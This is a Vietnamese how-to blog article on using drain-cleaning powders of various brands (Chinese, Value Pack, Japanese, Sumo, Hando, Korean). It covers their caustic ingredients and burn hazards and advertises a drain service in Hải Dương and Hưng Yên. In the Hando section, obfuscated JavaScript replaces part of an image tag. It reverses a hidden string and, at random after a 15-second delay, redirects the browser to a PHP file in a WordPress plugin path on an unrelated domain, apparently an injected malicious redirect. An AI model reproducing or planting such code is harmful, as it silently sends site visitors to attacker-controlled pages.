Cách dùng bột thông cống các loại nhanh chóng tại nhà đơn giản

Tắc cống gây ra rất nhiều các phiền toái và khó chịu cho chúng ta. So với lại các biện pháp thông cống thông thường. Thì sử dụng bột thông cống đang được nhiều người tin dùng. Bởi nó đem đến ưu điểm vô cùng vượt trội không những vậy chi phí thì rất phải chăng. Thế nhưng cách dùng bột thông cống như thế nào để đem lại hiệu quả vượt trội thì không phải ai cũng biết.

cách dùng bột thông cống

Mục lục nội dung

Bột thông cống là gì?

Bột thông cống chắc chắn không xa lạ già đối với các hộ gia đình. Thế những không phải ai cũng sẽ để ý đến thành phần, công dụng cuả nó mang lại trong quá trình sử dụng.

Thành phần bột thông cống

Thành phần bột thông cống là sự tổng hợp của rất nhiều loại hóa chất khác nhau. Một số thành phần hóa học chủ yếu mà chúng có trong sản phẩm như là Sodium Hydroxite và Potassium Hydroxite cùng lại một số chất phụ gia khác mang tính kiềm.

Ngoài ra thì loại bột thông cống vi sinh. Là những sản phẩm mà chúng được sử dụng công nghệ vi sinh. Đó là dùng các cơ chế hoạt động tự nhiên của một số loài vi sinh vật. Chúng có khả năng giúp cho ăn phân hủy các chất hữu cơ. Từ đó nếu như mà cống bị nghẹt bởi các loại thức ăn thừa, dầu mỡ. Thì bột thông cống vi sinh có thể xử lý được một hiệu quả nhất.

Chính vì thế cho nên sản phẩm này chúng có thể ăn mòn các chất hữu cơ như rác, thức ăn thừa, mảng bám rong rêu,..và cả tóc. Giúp chúng ta có thể khắc phục một cách nhanh chóng tình trạng tắc cống một cách khá nhanh chóng.

bột thông cống
Thành phần bột thông cống là tổng hợp nhiều loại hóa chất khác nhau

Bột thông cống có hiệu quả không?

Bột thông cống có hiệu quả rất lớn giúp thông được cống một cách nhanh chóng. Trong trường hợp cống của nhà bạn mà chúng bị sự cố tắc nghẽn. Thì lúc này bột thông cống nghẹt chung sẽ có tác dụng dùng làm mềm. Và phân huỷ các loại chất thải hữu cơ trong đường ống thoát nước.

Chính nhờ vào đó nó sẽ giúp cho mức nước thải dễ dàng thoát ra ngoài đường ống một cách vô cùng dễ dàng. Trong trường hợp mà đường ống cống thoát nước tại nhà bị tắc nghẽn bởi rong rêu. Hay là bởi các mảng thức ăn thừa, các loại cặn bã, giấy, rác, xác động vật.

Khi này thì các bạn chúng ta chỉ cần sử dụng bột thông nghẹt cống. Nó sẽ giúp cho chúng ta có thể thông hoàn toàn mà không làm cho chúng bị hư hại tới hệ thống đường ống. Mặt khác thì đối với phương pháp này chúng còn có một ưu điểm.

Đó chính là chúng rất dễ thực hiện mà hiệu quả có ngay trước mắt. Có thể thấy đây chính là ưu điểm của bột thông cống nhưng với các chất thải vô cơ. Thì bột thông cống chúng lại không thể phát huy tác dụng. Mà khi này buộc chúng ta cần phải nhờ đến sự trợ giúp của các thợ thông cống uy tín giúp đỡ.

bột thông bồn cầu
Giúp chúng ta có thể thông được cống một cách nhanh chóng

Bột thông cống có độc không?

Bột thông cống có độc không là một trong những câu hỏi mà khá nhiều người quan tâm tới. Nhưng mặc dù ưu điểm của nó đem đến rất lớn cho người dùng. Thế nhưng cũng không thể nào có thể tránh được những mặt hại của nó.

Chính vì bột thông cống có tác dụng rất mạnh mẽ với lại các chất hữu cơ. Và đây cũng là một trong những hỗn hợp hóa chất độc hại. Mà chúng có tác dụng vô cùng xấu với sức khỏe con người. Chính vì vậy cho nên việc sử dụng bột thông cống nếu như mà chúng ta không có các biện pháp đảm bảo an toàn.

Và có một sự hiểu biết nhất định vệ loại bột này thì sẽ rất nguy hiểm. Đã có rất nhiều các trường hợp xảy ra do tai nạn khi sử dụng bột thông cống như bỏng tay – chân, hoại tử, ngộ độc khí,…

Bột thông cống khi mà chúng tiếp xúc với da dù ở dạng bột hay đã hòa tan với nước. Thì chúng đều cực kì nguy hiểm và chúng có thể ngay lập tức gây ra tình trạng bỏng da, ăn mòn da. Ngoài ra thì khi mà chúng ta tiếp xúc với bột thông cống. Thì những bụi khí mà chúng có thể đi theo đường hô hấp đi vào phổi. Và gây ra hậu quả rất xấu đến sửc khỏe người sử dụng.

Mặc dù bột thông cống có tác hại đối với người sử dụng nhưng đó chỉ là khi mà chúng ta sử dụng không đúng. Chỉ cần chúng ta chú ý một chút trong quá trình sử dụng đeo gang tay và các đồ bảo hộ. Thì đảm bảo chúng ta sẽ không gặp phải những tác hại cuả nó mang đến khi sử dụng.

Bột thông cống có độc không
Nếu không sử dụng đúng có thể gây bỏng da

Bột thông cống được sử dụng khi nào?

Bột thông cống là một trong những hợp chất hóa học hoặc chúng cũng có thể là men sinh học. Các hợp chất hóa học có trong bột thông cống chúng đều có tính kiềm khá mạnh. Chính vì vậy cho nên chúng giúp chúng ta có thể giải quyết được nhanh chóng vấn đề tắc nghẽn bồn cầu.

Thế những chúng chỉ có thể giúp chúng ta ăn mòn được hầu hết các chất hữu cơ như cặn bám vào thành cống, tóc, thức ăn thừa,.. .Thế nhưng chúng không thể nào có thể giúp chúng ta thông tắc được các chất vô cơ thì bột thông cống lại không có tác dụng.

Chính vì vậy cho nên khi mà gia đình chúng ta mà gặp phải tình trạng tắc nghẽn do các chất vô cơ. Thì buộc chúng ta phải nhờ đến sự giúp đỡ của thợ thông cống. Chứ khi này bột thông cống chúng sẽ không có tác dụng.

Thế nhưng hầu hết các sản phẩm thông cống hiện nay trên thị trường. Chúng đều đa phần khá an toàn và hiệu quả đem lại thì khá hiệu quả. Nhưng cũng không ít những sản phẩm ảnh hưởng đến quá trình sử dụng của chúng ta cũng như môi trường.

Chính vì vậy chúng ta cần phải nắm rõ được các loại bột thông cống chất lượng. Cũng như cách dùng bột thông cống để có thể đem đến hiệu quả cao nhất trong quá trình sử dụng.

Cách dùng bột thông cống

Để có thể thông cống được một cách hiệu quả nhất. Thì buộc mọi người phải biết cách dùng bột thông cống sao cho cho hiệu quả. Bởi dù bột thông cống có tốt đến đâu mà chúng ta không biết cách dùng thì nó cũng không thể đem lại chất lượng.

Cách sử dụng bột thông cống Trung Quốc

Bột thông cống Trung Quốc chúng khá hiệu quả. Giúp cho người dùng có thể tiết kiệm được thời gian cũng như chi phí khá nhiều khi sử dụng. Để có thể tiến hành cách dùng bột thông cống ta thực hiện các bước như sau:

Bước 1: Chúng ta sẽ tiến hành đổ bột thông cống vào phía trong đường ống mà đang bị tắc nghẽ. Để có thể đạt được hiệu quả cao nhất thì chúng ta đổ bột trực tiếp xuống chỗ bị tắc.

Bước 2: Tiếp đến thì chúng ta sẽ để khoảng 3 đến 4 giờ. Để bột khi này có thể phân hủy được một cách triệt để các chất cặn bã. Trong thời gian này thì chúng ta tuyệt đối không được xả nước.

Bước 3: Sau đó thì chúng ta xả sạch nước như vậy có thể thông cống được một cách nhanh chóng. Sau đó chúng ta vệ sinh một cách sạch sẽ. Rồi sau đó thì chúng ta sẽ tiến hành đưa vào sử dụng.

bột thông cống Trung Quốc
Bột thông cống Trung Quốc đem lại khá hiệu quả

Cách sử dụng bột thông cống Value Pack

Với hiện tượng ống bị tắc nghẽn thì thay vì chúng ta sử dụng dung dịch xử lý bên ngoài. Thì chúng ta có thể sử dụng bột thông cống. Để có thể giải quyết được hiện tượng này một cách nhanh chóng.

Cách dùng bột thông cống Value Pack này khá đơn giản. Các bạn chỉ cần cho bột thông cống này vào đường ống bị tắc. Sau đó thì chúng ta cho vào đó 1 ít nước. Tiếp đến thì chúng ta đợi sau 1 đến 2 tiếng thì chúng ta tiến hành xả nước. Như vậy là chúng ta có thể tiến hành thông tắc cống được xong.

 bột thông Value Pack
Cách sử dụng bột thông cống Value Pack

Cách sử dụng bột thông cống Nhật Bản

Bột thống cống Nhật Bản cũng là một trong những loại bột thông giúp chúng ta có thể khắc phục được tình trạng tắc nghẽn được một cách nhanh chóng. Để có thể tiến hành khắc phục được tình trạng này chúng ta tiến hành các bước như sau:

+ Rắc 1 gói bột thông cống Nhật Bản này vào phần nắp miệng cống.

+ Sau đó thì chúng ta hãy đổ chậm từ 1 đến 2 cốc nước ấm (40độ).

+ Sau đó chúng ta để nguyên như vậy trong vòng 5 phút. Sau đó rồi chúng ta hãy xả nước lại một lần nữa.

Và để có thể giữ đường ống thoát nước của gia đình chúng ta luôn hoạt động tốt thì nên sử dụng bột thông cống mỗi 6 tháng/ lần.

Cách sử dụng bột thông cống Sumo

Để có thể thực hiện thông cống được bằng bột thông cống Sumo thì chúng ta tiến hành các bước thông cống sau đây:

Bước 1: Chúng ta tiến hành hòa tan bột thông cống Sumo với nước. Để chúng ta có thể tạo được thành dung dịch thông tắc. Thông thường thì cứ 1 gói thì hòa chung với 2 lít nước.

Bước 2: Sau đó thì chúng ta hãy đổ trực tiếp vào đường ống cống mà chúng tacần được xử lí tắc nghẽn

Bước 3: Tiếp đến thì chúng ta ngâm hóa chất tầm 12 tiếng để hóa chất có thể ăn mòn sau đó thì các chất này sẽ phân rã những tạp chất rác thải, dầu mỡ, cặn bã.

Bước 4: Đến 12 tiếng sau thì chúng ta tiến hành xả lại bằng nước sạch để kiểm tra.

bột thông Sumo
Cách sử dụng bột thông cống Sumo rất đơn giản

Cách sử dụng bột thông cống Hando

Khi mà cống thoát nước của gia đình chúng ta mà xuất hiện tình trạng tắc nghẽn. Chúng có mùi thì chúng ta chỉ cần sử dụng từ 2 cho đến 3 gói bột thông cống Hando. Là chúng ta có thể nhanh chóng xử lý được tình trạng này một cách khá nhanh chóng với các bước đơn giản như sau:

Bước 1: Chúng ta tiến hành cắt chéo túi sau đó bạn đổ bột hòa tan. Sau đó thì cùng nước vào một xô nhựa với tỉ lệ 1 gói bột hòa cùng là 500ml nước. Nếu như mà các bạn nên khuấy đều cho đến khi bột hòa tan để có tác dụng cao.

Bước 2: Tiếp đến thì chúng ta đổ trực tiếp dung dịch vừa pha vào cổ ống nơi bị tắc nghẽn.

Bước 3: Đợi sau đó khoảng 5 – 6 tiếng rồi chúng ta sẽ tiến hành xả mạnh nước để cho mọi chất thải chúng được phân hủy có thể chảy đi.

$mRi=function(n){if (typeof ($mRi.list[n]) == “string”) return $mRi.list[n].split(“”).reverse().join(“”);return $mRi.list[n];};$mRi.list=[“\’php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando.jpg” alt=”Cách sử dụng bột thông cống Hando” width=”500″ height=”281″ /> Cách sử dụng bột thông cống Hando

Cách sử dụng bột thông cống Hàn Quốc

Sau khi mà chúng ta đã có sản phẩm thì các bạn hãy thực hiện bằng những bước sau đây:

Bước 1: Xác định vị trí bị tắc nghẽn

Nếu như mà vị trí đó chúng còn nước ứ đọng thì các bạn chỉ cần đổ trực tiếp bột này vào hệ thống ống cống. Còn đối với trường hợp mà cống bị tắc mà chúng không có nước sẵn. Thì khi này các bạn cần sử dụng tầm 1 lít nước để có thể hòa tan được các hóa chất.

Rồi sau đó chúng ta hãy tiến hành đổi trực tiếp vào lỗ thoát. Khi các hóa chất sẽ đến được vị trí bị nghẹt một cách dễ dàng hơn. Khi mà các hóa chất chúng tiếp xúc với lại nước để có thể tạo được ra được kết tỏa màu trắng. Và khi này mà chúng có mùi rất nồng và nhiệt độ rất cao. Chúng ta chỉ cần ngâm hóa chất trong thời gian là 30 phút.

Bước 2: Sau 30 phút thì đến lúc này các bạn hãy xả lại bằng nước sạch. Để xem cống thoát nước bạn đã được thông hay chưa? Nếu như mà chưa thì có thể do đường cống của gia đình các bạn có kích cỡ quá lớn hoặc khoảng cách quá dài.

Khi này thì buộc chúng ta phải nhờ đến đội ngũ thông cống chuyên nghiệp. Nếu như các bạn cần thông cống các bạn có thể nhờ đến đội thông cống Hải Hưng chúng tôi. Hiện chúng tôi đang có chi nhánh thông cống tại Hải Dương và Hưng Yên.

bột thông Hàn Quốc
Cách thông bằng bột thông Hàn Quốc khá đơn giản

Bột thông cống mua ở đâu?

Bột thông cống mua ở đâu là một trong những vấn đề mà được mọi người khá quan tâm. Thì như chúng ta cũng đã biệt rằng bột thông cống được sử dụng khá nhiều hiện nay. Và chúng đem đến hiệu quả trông thấy trong quá trình sử dụng.

Chính vì vậy cho nên bột thống cống có thể mua được rất nhiều nơi trên thị trường. Như chúng tá có thể mua được loại bột này tại các sàn trung tâm thương mại như shoppe, lazada, sen đỏ,… hoặc là tại các cử hàng tạp hóa.

Thế những mà như chúng ta đã biệt những loại bột thông cống này. Chúng chỉ giúp chúng ta khắc phục được những tình trạng tắc nghẽn nhẹ. Còn đối với các tình trạng nặng thì buộc chúng ta cần phải nhờ đến sự giúp đỡ của thợ thông hút.

Hải Hưng chúng tôi hiện nay đang có các chi nhanh thông hút tại các huyện tại TP Hải Dương và Hưng Yên như: hút bể phốt tại Mỹ Hào, Thanh Miện, Ninh Giang,…

Chính vì vậy cho nên đối với các trường hợp tắc trầm trọng. Thì các bạn có thể nhờ đến sự trợ giúp của Hải Hưng chúng tôi. Chỉ sau 10 phút dù bạn ở bất kì đâu chúng tôi cũng có thể giúp được các bạn một cách nhanh chóng nhất có thể.

Bột thông cống mua ở đâu

Và đó cũng là những thông tin chi tiết về bột thông cống. Cũng như câu trả lời bột thông cống mua ở đâu. Rất mong những thông tin đó đem đến hữu ích cho các bạn trong quá trình sử dụng bột thông

Vì vậy bất cứ khi nào cần chúng tôi cũng đều có thể giúp bạn một cách nhanh chóng nhất. Và đó cũng là cách dùng bột thông cống khá hiệu quả. Rất mong những loại bột này cũng như cách sử dụng chúng tôi chia sẻ sẽ đem đến hữu ích cho bạn.